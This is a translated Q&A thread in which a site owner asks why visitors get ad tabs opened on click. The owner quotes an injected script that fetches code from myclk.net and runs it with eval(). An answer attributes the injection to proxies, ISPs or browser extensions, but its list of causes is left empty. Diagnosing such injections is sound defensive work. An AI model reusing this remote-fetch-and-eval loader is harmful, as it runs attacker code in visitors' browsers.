我在这个问题上有点迷失,所以请原谅。我知道关于这一点还有其他线索,但我无法找到答案。
在网站上加载时,用户点击它的位置并不重要是浏览器中带有广告的打开添加标签。
到目前为止,我通过查看浏览器控制台找到的是加载了一些js文件
http://cdn.mecash.ru/js/replace.js
此文件包含
!function(w){if(w.self==w.top){var r=new XMLHttpRequest;r.onload=function(){eval(this.responseText)},r.open("get","//myclk.net/js/tx.js",!0),r.send()}}(window);
并且通过查看此tx.js我怀疑这是黑客注入的。
问题是,我一直在查看主机上的文件,但无法找到任何此类js的内容。
有人可以帮助我,告诉我在哪里或者我怎么能找到它?
答案 0 :(得分:4)
实际上,当数据从服务器传输到客户端时会注入这种文件。 您的实际代码不包含脚本,但是它们被注入并在客户端计算机上执行..
可能注入:
您可以通过https而不是http传输内容来避免代理/ ISP注入。但是,只能通过卸载扩展来避免browswer extensions完成注入。